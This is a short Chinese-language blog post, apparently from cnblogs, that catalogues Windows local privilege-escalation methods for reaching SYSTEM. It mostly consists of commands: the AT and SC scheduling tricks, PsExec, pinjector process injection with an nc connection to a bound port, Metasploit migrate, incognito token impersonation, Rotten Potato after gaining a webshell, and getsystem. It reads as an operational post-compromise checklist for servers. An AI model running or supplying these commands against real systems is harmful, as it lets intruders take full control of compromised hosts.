本地用户提权
AT命令提权(适用于sever 2003及win7以前)
普通用户在cmd中输入 at 时间 /interactive cmd
到时间后会弹出新的cmd窗口,该窗口的用户权限是system
SC命令提权(适用于sever 2003及以前)
#创建一个名叫syscmd的新的交互式的cmd执行服务
sc Create syscmdabc binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmdabc
PStools提权(适用于sever 2008,sever 2012等,部分个人主机不能执行)
下载PStools,再将其中的psexec.exe上传到服务器
然后在服务器cmd窗口执行:
psexec.exe -accepteula -s -i -d cmd
生成的新的cmd窗口权限为system
进程迁移注入提权(适用于servee 2008以前版本)
下载并安装pinjector.exe到服务器
查看本地运行的进程及权限
pinjector -l
将该进程的权限绑定到本地的一个端口上
pinjector -p 420 cmd 3333
新开一个cmd,使用nc监听本地的该端口:
nc 192.168.46.149 3333
此时的权限为system
msf进程迁移提权(Win2008&2012&2016-阿里云服务器)
服务器执行msf后门,在msf上线后:
ps //查看进程及权限
migrate PID //迁移对应PID
注意:权限太低无法执行。
令牌窃取提权(Win2008 Win2012 阿里云服务器)
use incognito
list_tokens -u \\查看当前令牌信息
impersonate_token "NT AUTHORITY\SYSTEM(权限信息)"
获取webshell后,过低权限用户利用烂土豆先提权,再令牌窃取
服务器中有potato.exe,在msf中执行:
execute -cH -f ./potato.exe (当前路径下有potato.exe)
再令牌窃取:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
msf自动提权
getsystem
标签:exe,Windows,cmd,本地用户,提权,msf,服务器,权限
From: https://www.cnblogs.com/arongsec/p/17230875.html